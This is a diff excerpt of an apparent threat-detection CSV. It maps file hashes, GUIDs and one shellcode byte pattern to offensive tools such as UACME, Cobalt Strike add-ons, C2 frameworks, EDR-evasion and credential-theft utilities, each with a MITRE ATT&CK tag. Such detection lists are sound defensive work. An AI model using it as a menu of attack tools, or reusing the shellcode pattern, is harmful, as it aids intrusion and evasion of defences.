-"*4aa24c1115cc3ed71027f760c7564357c162a09de58d75b5e9037cd869fb2a8a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*4c21f433ebb3a72668a36a707daed37afb5c3ed2402d60b1634a741c36f2ed10*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*4C3B106C-8782-4374-9459-851749072123*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*44c2e8c3e25b9d75d319a256eaaca3d195d789209a6491795696b5e33b142513*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*45D748AC-9B16-426E-808D-94662B0417F7*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*46ce4d9e34f8845b17c5a9b87891b5ace6dca83427377029ee1d06af5af6d637*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*47c05b996b2831e39c05190b62fb25558a8a05173eb4b5f5b263b841e0bed3f2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*48da9c5487412fa708a6d7fb753a238a9258fd1bad88d564ad07178d278a7b8d*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*497CA37F-506C-46CD-9B8D-F9BB0DA34B95*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*49d94561eee009acc25c36857bb0260dd8d8a38e6cdf0286a49463d90724b9b1*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4a548ba1be4de75a03af674d670ff10375700a18babc7cb3a4d1406045e2df04*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4aa24c1115cc3ed71027f760c7564357c162a09de58d75b5e9037cd869fb2a8a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4c21f433ebb3a72668a36a707daed37afb5c3ed2402d60b1634a741c36f2ed10*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4C3B106C-8782-4374-9459-851749072123*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" "*4C574B86-DC07-47EA-BB02-FD50AE002910*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*4cec28b4c00002245dffc8346be0cc11*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" -"*4d15af5a22467795c5367c3956746d01424795784f62ca3f30e4619c063338a5*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4d15af5a22467795c5367c3956746d01424795784f62ca3f30e4619c063338a5*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*4D1B765D-1287-45B1-AEDC-C4B96CF5CAA2*","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" "*4d262988fe9d252191947ab780535d496ed24fa27668cf76c6cb9b6474a391c4*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*4d5350c8-7f8c-47cf-8cde-c752018af17e*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","1","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" -"*4d870a821d4104536f0ae7d1920748e9a6ea2dc828103470516a9a2f0b9601ff*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4d870a821d4104536f0ae7d1920748e9a6ea2dc828103470516a9a2f0b9601ff*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*4ddc82b4af931ab55f44d977bde81bfbc4151b5dcdccc03142831a301b5ec3c8*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*4DE43724-3851-4376-BB6C-EA15CF500C44*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*4E0CA74F5E074DFF389263D15E3913750EB437C1C3CD3B212C2998352023B980*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*4F2AD0E0-8C4D-45CB-97DE-CE8D4177E7BF*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*4g3nt47/Striker*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*50050/SharpC2*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*5067F916-9971-47D6-BBCB-85FB3982584F*","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","0","N/A","N/A","10","1649","263","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z" +"*505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*5067F916-9971-47D6-BBCB-85FB3982584F*","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","0","N/A","N/A","10","1650","263","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z" "*5086CE01-1032-4CA3-A302-6CFF2A8B64DC*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","","" "*516280565958*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*516280565959*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" -"*526f652d4d9e20a19374817eac75b914b75f3bfaecc16b65f979e5758ea62476*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" -"*52a696ae714eb81033c477d1ec6c01389eef56c847609e89d360c2fb6899b4b6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*53b83ef74e74ea230eeb916254753d886e8ec04e09cd8823af9f94660bdbc43b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*526f652d4d9e20a19374817eac75b914b75f3bfaecc16b65f979e5758ea62476*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*52a696ae714eb81033c477d1ec6c01389eef56c847609e89d360c2fb6899b4b6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*53b83ef74e74ea230eeb916254753d886e8ec04e09cd8823af9f94660bdbc43b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*5439CECD-3BB3-4807-B33F-E4C299B71CA2*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*555662D4CCBB940D87869E6295EC7CC74BB85D8C8FC5916EC34D1226704578C5*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" -"*555AD0AC-1FDB-4016-8257-170A74CB2F55*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*555AD0AC-1FDB-4016-8257-170A74CB2F55*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*55A48A19-1A5C-4E0D-A46A-5DB04C1D8B03*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*55F0368B-63DA-40E7-A8A5-289F70DF9C7F*","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","0","N/A","9","2","149","21","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" -"*56843f0410f4c97e8d0809bf7fe4c3e7efaf0dcefd595da58da07794d1709f27*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*574a8de72c4661a520afbcdbe4580335203d0f1b9da5d9ba3659d30d02b89466*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*57A893C7-7527-4B55-B4E9-D644BBDA89D1*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","2","141","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*56843f0410f4c97e8d0809bf7fe4c3e7efaf0dcefd595da58da07794d1709f27*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*574a8de72c4661a520afbcdbe4580335203d0f1b9da5d9ba3659d30d02b89466*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*57A893C7-7527-4B55-B4E9-D644BBDA89D1*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" "*57D4D4F4-F083-47A3-AE33-AE2500ABA3B6*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" -"*59744929cc3a6d02d9ec26cc2945b00eaa6079c32602f460558adb9e7146f824*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*5994c2c930bf095841520a4e6859511485f6ad0eec0d660392462402c781a6ba*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*5a27534e0361dc8dce940b8732c306443af9944e23aaac6865131e1eb7570687*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*59744929cc3a6d02d9ec26cc2945b00eaa6079c32602f460558adb9e7146f824*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5994c2c930bf095841520a4e6859511485f6ad0eec0d660392462402c781a6ba*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5a27534e0361dc8dce940b8732c306443af9944e23aaac6865131e1eb7570687*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" 